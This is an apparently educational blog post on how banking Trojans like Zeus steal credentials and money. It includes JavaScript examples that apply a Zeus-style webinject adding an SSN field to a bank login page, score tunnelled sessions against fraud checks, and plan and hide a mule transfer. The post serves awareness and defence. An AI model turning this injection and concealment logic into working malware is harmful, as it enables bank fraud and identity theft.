The Power of Financial Malware
There are a great many types of malware out there. Malware, software built with criminal or malicious intent, includes programs that inject ads (adware); programs that encrypt files in order to extort their owner (ransomware); and, of course, programs that pose as something harmless while silently recording everything the user does on the infected computer in order to steal their credentials (Trojan horses). And malware isn’t only developed and used by criminal hackers. Governments and intelligence agencies have produced sophisticated malware too, such as the famous Stuxnet and Flame.
But malware developed by cybercriminals can be just as sophisticated as the work of a government or intelligence agency. One especially sophisticated type is financial malware: Trojan horses specifically designed to steal usernames, passwords and other credentials used with financial institutions such as banks.
Below, we explore some of the capabilities financial malware often possesses. Not every financial Trojan has all of these capabilities, but Zeus (also known as Zbot), the most famous financial malware in criminal hands, has every one of them (yikes!).
1. Keylogging Software
Can you imagine what a hacker could do if he saw everything you type on your keyboard? For starters, he’d have access to everything: your email account, social media accounts, bank account, and more. Thinking about everything he could accomplish with that information (like draining your bank account, or taking out loans in your name and wrecking your credit) is scary.
Keylogging malware, as the name suggests, logs every key pressed on the infected machine. The Trojan simply captures and saves each keystroke, allowing the cybercriminal to read what was typed later. It makes no difference whether the text was hidden on screen (such as text entered into a password field) or even deleted by the user after it was typed; every keystroke, including the Backspace that deleted it, is saved by the keylogger.
The downside of keylogging (from the hacker’s perspective, of course) is that many keyloggers do not record which field the logged text was typed into. A keylogged word could be a username, a password or anything else, and it is left to the hacker to work out which is which. That probably isn’t a difficult job: it’s easy to guess that words like JohnS2112 or Mikeis2kul are usernames, while a word like Blue123abc is likely a password.
2. Form Grabbing
Alongside “word grabbing” through keylogging, hackers also employ form grabbing. Every time we perform a Google search, or log into Facebook or any other online service, we’re filling out a form. These forms have a variety of fields, including text fields (password fields among them), buttons, multiple-choice options and more.
Conveniently for hackers, the form data the browser sends to the server includes both the values the user entered into each part of the form and the name of each field (username, password, and so on). A form-grabbing Trojan captures this data in an easy-to-use, readable format, with no guessing about which value is which.
Figure: an example of a form a user may fill out, alongside the form grabber data the hacker would receive for it.
Regardless of what site you’re using when you fill out a form, the form-grabbing malware runs locally on the victim’s computer and hooks the browser’s own network functions, so it reads the form data before the browser encrypts it. It doesn’t matter that the connection is secured with HTTPS (the little padlock in the address bar): the padlock protects data in transit, not inside the browser that produced it, and everything reaches the malware in the clear. (Wondering how a victim’s computer gets infected in the first place? See a quick explanation in our recent post about Exploit Kits.)
Form grabbing and keylogging work well in conjunction. Form grabber output is easier to read, but some sites obfuscate or encrypt field values in the browser before submitting them, and a grabbed form then contains gibberish. A web page cannot disguise which keys were physically pressed, so the keylog fills that gap. The keylogger’s own blind spot, input made with the mouse rather than the keyboard, is covered later on.
3. HTML Injection
For hackers that are out to do some serious damage, such as breaching into a victim’s bank account and stealing money, keylogged words and grabbed forms don’t always cut it.
When a user performs an online banking transaction, the bank will typically ask for additional authentication details such as a social security number, mother’s maiden name or date of birth. These details aren’t normally requested during the initial login, so a keylogger or form grabber never sees them. What’s a cybercriminal to do? Why, simply add them to the login form using HTML injection, of course.
Through HTML injection (often called a web inject), the malware adds fields of the hacker’s choosing to any form. So, when the user of the infected machine loads their bank’s website, they won’t only see the usual username and password fields. The malware on their machine adds extra fields requesting the data the hacker is after, such as a social security number. The page still sits at the bank’s real address with a valid padlock, so even a seasoned online banking user may assume the new field is an added security measure introduced by the bank, and will readily fill it in.
Here’s what a form with HTML injections might look like:
An example of an HTML Injection. The original page is on the left; the page on the right was altered by malware. Source: The blog of Andreas Baumhof.
Of course, hackers who want to perform HTML injection can simply buy ready-made injection kits on underground markets, so they don’t need much technical know-how to use this powerful tool. They can even buy injections tailored to specific banks.
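The following is an added example, not code from the original post or from any real kit, showing how such an injection rewrites a login page on the infected machine. The configuration syntax (set_url, data_before, data_inject, data_after, data_end, with * as a wildcard) follows the widely documented Zeus webinjects format; the bank URL, the sample page and the injected field are constructed for this example.

```javascript
// Added example: applying a Zeus-style web inject to a page on the victim's machine.
// Config syntax follows the documented Zeus webinjects format; the URL, page and
// injected field below are constructed, not taken from a real kit.

// "GP" restricts the rule to GET and POST requests for the matching URL mask.
const WEBINJECT_CONFIG = `
set_url https://online.bank.example/login* GP
data_before
<input*name="password"*>
data_end
data_inject
<br>For your security, confirm your SSN: <input type="text" name="ssn">
data_end
data_after
data_end
`;

// The page exactly as the bank's server delivered it (constructed sample).
const ORIGINAL_PAGE = `<form method="post" action="/login">
<input type="text" name="username">
<input type="password" name="password">
<input type="submit" value="Log in">
</form>`;

// Parse the config into rules: { urlMask, flags, before, inject, after }.
function parseWebinjects(text) {
  const rules = [];
  let rule = null;
  let section = null;
  for (const raw of text.split("\n")) {
    const line = raw.trim();
    if (line.startsWith("set_url ")) {
      const [, mask, flags = ""] = line.split(/\s+/);
      rule = { urlMask: mask, flags, before: "", inject: "", after: "" };
      rules.push(rule);
    } else if (/^data_(before|inject|after)$/.test(line)) {
      section = line.slice("data_".length);
    } else if (line === "data_end") {
      section = null;
    } else if (rule && section !== null) {
      rule[section] += (rule[section] ? "\n" : "") + raw;
    }
  }
  return rules;
}

// Turn a mask with * wildcards into a regex; anchored masks must match the whole URL.
function maskToRegex(mask, anchored = false) {
  const body = mask
    .split("*")
    .map((part) => part.replace(/[.*+?^${}()|[\]\\]/g, "\\$&"))
    .join("[\\s\\S]*?");
  return new RegExp(anchored ? `^${body}$` : body);
}

// Rewrite the HTML the browser is about to render: insert data_inject after the
// text matching data_before (and before data_after, when one is given).
function applyWebinjects(url, html, rules) {
  let out = html;
  for (const r of rules) {
    if (!maskToRegex(r.urlMask, true).test(url)) continue;
    const before = maskToRegex(r.before).exec(out);
    if (!before) continue;
    let pos = before.index + before[0].length;
    if (r.after) {
      const after = maskToRegex(r.after).exec(out.slice(pos));
      if (!after) continue;
      pos += after.index;
    }
    out = out.slice(0, pos) + r.inject + out.slice(pos);
  }
  return out;
}

const rules = parseWebinjects(WEBINJECT_CONFIG);
console.log(applyWebinjects("https://online.bank.example/login?lang=en", ORIGINAL_PAGE, rules));
```

The bank never served the SSN field, yet the victim sees it at the bank’s genuine address. This is also the defender’s lever: a page integrity check that compares the DOM the browser renders against the HTML the server sent will spot the extra field, whereas any check that runs on the server sees nothing unusual.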
4. Tunneling Through a Victim’s Machine
With the victim’s credentials in-hand using the capabilities we’ve discussed up until now, it’s time for the hacker to turn the stolen data into cash.
Most anti-fraud measures employed by banks profile users and look for anomalies in order to detect suspicious activity. Every time a user logs into his or her bank account online, multiple characteristics of the session are collected: which browser and operating system are in use, the IP address and its country, whether the cookies the bank previously set are present, and so on. The more of these differ from what the bank is used to seeing for that customer, the more scrutiny is applied to any money transfer attempted during that login session.
To circumvent such measures, financial malware lets the hacker tunnel through the victim’s machine. The Trojan turns the infected PC into a proxy (Zeus, for example, includes a SOCKS “backconnect” proxy, and many banking Trojans also carry a hidden remote-desktop module), so the hacker’s session leaves from the victim’s own computer, IP address and browser. Most of the characteristics the bank tracks then look exactly as they normally do. After all, it is the user’s machine connecting to the bank, even though a puppet-master sitting somewhere across the globe is pulling the strings.
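To show why this works, here is an added example (not code from the original post, and a much simplified stand-in for a real anti-fraud engine) that scores a login session against the customer’s known profile. The profile, the three sessions, the weights and the review threshold are all constructed assumptions; real systems use many more signals, but the mechanism is the same.

```javascript
// Added example: a simplified device-profile check of the kind banks run, and how
// a session tunnelled through the victim's machine slips past it.
// Profile, sessions, weights and threshold are constructed for this example.

// What the bank has seen from this customer on previous logins.
const KNOWN_PROFILE = {
  userAgent: "Mozilla/5.0 (Windows NT 6.1; WOW64) Firefox/31.0",
  platform: "Windows",
  language: "en-US",
  timezone: "America/New_York",
  ipCountry: "US",
  ipAsn: "AS7922",
  hasDeviceCookie: true,
};

// How much risk each mismatch adds, and the score at which a transfer gets reviewed.
const WEIGHTS = {
  userAgent: 2, platform: 2, language: 1, timezone: 2,
  ipCountry: 4, ipAsn: 2, hasDeviceCookie: 3,
};
const REVIEW_THRESHOLD = 5;

// Compare a session with the profile and total the weights of everything that differs.
function scoreSession(profile, session) {
  const mismatches = Object.keys(WEIGHTS).filter((k) => profile[k] !== session[k]);
  const score = mismatches.reduce((sum, k) => sum + WEIGHTS[k], 0);
  return { score, mismatches, flagged: score >= REVIEW_THRESHOLD };
}

// Scenario 1: the attacker replays the stolen credentials from his own machine.
const DIRECT_LOGIN = {
  userAgent: "Mozilla/5.0 (X11; Linux x86_64) Chrome/36.0",
  platform: "Linux",
  language: "ru-RU",
  timezone: "Europe/Moscow",
  ipCountry: "RU",
  ipAsn: "AS12389",
  hasDeviceCookie: false,
};

// Scenario 2: same attacker, but routed through a VPN exit in the victim's country.
// Only the country matches; everything else still gives him away.
const VPN_LOGIN = { ...DIRECT_LOGIN, ipCountry: "US" };

// Scenario 3: the session is tunnelled through the victim's infected PC, so the bank
// sees the victim's browser, language, time zone, IP address and cookies.
const TUNNELED_LOGIN = { ...KNOWN_PROFILE };

for (const [name, session] of [["direct", DIRECT_LOGIN], ["vpn", VPN_LOGIN], ["tunneled", TUNNELED_LOGIN]]) {
  console.log(name, scoreSession(KNOWN_PROFILE, session));
}
```

The direct and VPN sessions are flagged; the tunnelled one scores zero because, from the bank’s side, nothing about it differs from the customer’s normal logins. This is exactly the weakness the capability exploits, and it is why device fingerprinting alone cannot stop a compromised endpoint.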
5. Man-In-The-Browser (MITB)
Leave it to hackers to develop ways to automate processes that would otherwise take up too much of their time and energy.
Here’s some food for thought: Hackers could have a LOT of stolen bank account information in-hand. Think: the online banking details of hundreds or even thousands of victims. And hackers are busy people; they simply don’t have the time to manually use all of those credentials in order to perform money transfers. That’s where Man-In-The-Browser malware (or MITB) comes in, to do the dirty work for them.
How Man-In-The-Browser Malware Works. Source: Security Intelligence
With an MITB capability, hackers can automate not only data collection, but also their cashout process. Here’s how it works:
A Man-In-The-Browser malware sits in the background and waits for the user to log into their online bank account. Once the user logs in, the Man-In-The-Browser script is activated and automatically obtains the user’s account balance. The script then communicates with a server that’s run by the hacker and retrieves the details of the account to which the stolen money will be transferred (this account is typically a mule account). The transfer amount is calculated based on the balance and guidelines regarding how much the mule account can receive. And voila! It then issues the money transfer.
Since the whole thing is automated, the money transfer only takes a matter of seconds. During those precious moments, the victim thinks the online banking page is still loading (I don’t know about you, but when a page takes a few extra seconds to load, I usually think it’s an issue with my Internet speed… not that super-sophisticated malware is stealing my hard-earned money).
This financial malware is pretty intelligent, too. It’s not going to leave any tracks that might lead to the hacker getting caught. In order to keep victims in the dark, MITB malware actually changes the balance that appears once the victim’s online banking page finally loads to the balance before the fraudulent transfer. If the victim goes into his activity history page, the malware conceals the fraudulent transfer from the transactions list.
For their part, all the bank sees is a legitimate user logging into his account from his usual machine and issuing a money transfer (after all, the MITB script runs inside the victim’s own browser session). That makes MITB even more difficult to spot.
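As an added example (not code from the original post, and not taken from any real Trojan), here are the two decisions the MITB flow above comes down to, worked through in code: how much to move given the victim’s balance and the mule’s limits, and how to rewrite the statement the victim sees so the transfer disappears. The mule limits, the balance cushion and the sample statement are constructed assumptions.

```javascript
// Added example: the two steps of an automated MITB cash-out, as described above.
// Mule limits, the balance cushion and the statement are constructed for this example.

// Rules the attacker's server returns for the mule account (constructed).
const MULE = { account: "mule-account-placeholder", maxPerTransfer: 5000, remainingCapacity: 3200 };

// Leave a cushion so the account is not emptied, which would itself be an anomaly.
const MIN_BALANCE_TO_LEAVE = 250;

// Decide how much to transfer: bounded by the victim's balance and the mule's limits.
function planTransfer(balance, mule, minLeave = MIN_BALANCE_TO_LEAVE) {
  const available = balance - minLeave;
  const amount = Math.floor(Math.min(available, mule.maxPerTransfer, mule.remainingCapacity));
  if (amount <= 0) return null; // nothing to take without breaching a limit
  return { to: mule.account, amount };
}

// The statement as the bank's server renders it after the fraudulent transfer (constructed).
const SERVER_STATEMENT = {
  balance: 4800,
  transactions: [
    { id: "T1", description: "Salary", amount: 3000 },
    { id: "T2", description: "Groceries", amount: -120 },
    { id: "T3", description: "Transfer to mule-account-placeholder", amount: -3200 },
  ],
};

// Rewrite what the victim sees: drop the fraudulent transfer and add its amount back
// to the displayed balance, so the page stays internally consistent.
function concealTransfer(statement, transferId) {
  const hidden = statement.transactions.find((t) => t.id === transferId);
  if (!hidden) return statement;
  return {
    balance: statement.balance - hidden.amount,
    transactions: statement.transactions.filter((t) => t.id !== transferId),
  };
}

console.log(planTransfer(8000, MULE));                      // what gets sent to the mule
console.log(concealTransfer(SERVER_STATEMENT, "T3"));       // what the victim is shown
```

With a balance of 8000 the script moves 3200, the most the mule can still receive, and the doctored statement shows the pre-transfer balance of 8000 with the transfer missing. The victim’s only reliable view of the truth is one the malware cannot rewrite: a statement fetched on a different, clean device, or a paper statement.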
Financial malware clearly has a lot of capabilities, including some we haven’t covered here. Some are rarely used and exist only to obtain a particular piece of data in a very specific scenario. For example, some malware takes screenshots when the victim visits a specific website, which hackers rely on when the target uses a virtual keyboard. Virtual keyboards are designed to defeat keyloggers and form grabbers: instead of typing on the keyboard to complete a form, the user enters a password or PIN by clicking an on-screen keypad with the mouse, so “standard” malware never sees a keystroke to capture.
A virtual passcode keypad
To obtain the victim’s password anyway, the malware takes a screenshot (or a small crop around the cursor) every time the mouse button is pressed. The hacker ends up with a series of images that together reveal the PIN, click by click.
It’s important to be educated about financial malware, especially as it doesn’t look like this threat will be history anytime soon. Indeed, news outlets only recently reported the rise of Dyre, a brand new type of financial malware.
In the end, thanks largely to hackers’ ability to keep adding new features and capabilities to their malware, they will continue to find ways around almost any new security measure thrown at them. A machine infected by malware is essentially under the hacker’s complete control, and every one of the capabilities above follows from that.
Have you had any personal experience with financial malware? Tell us about it in the comments below!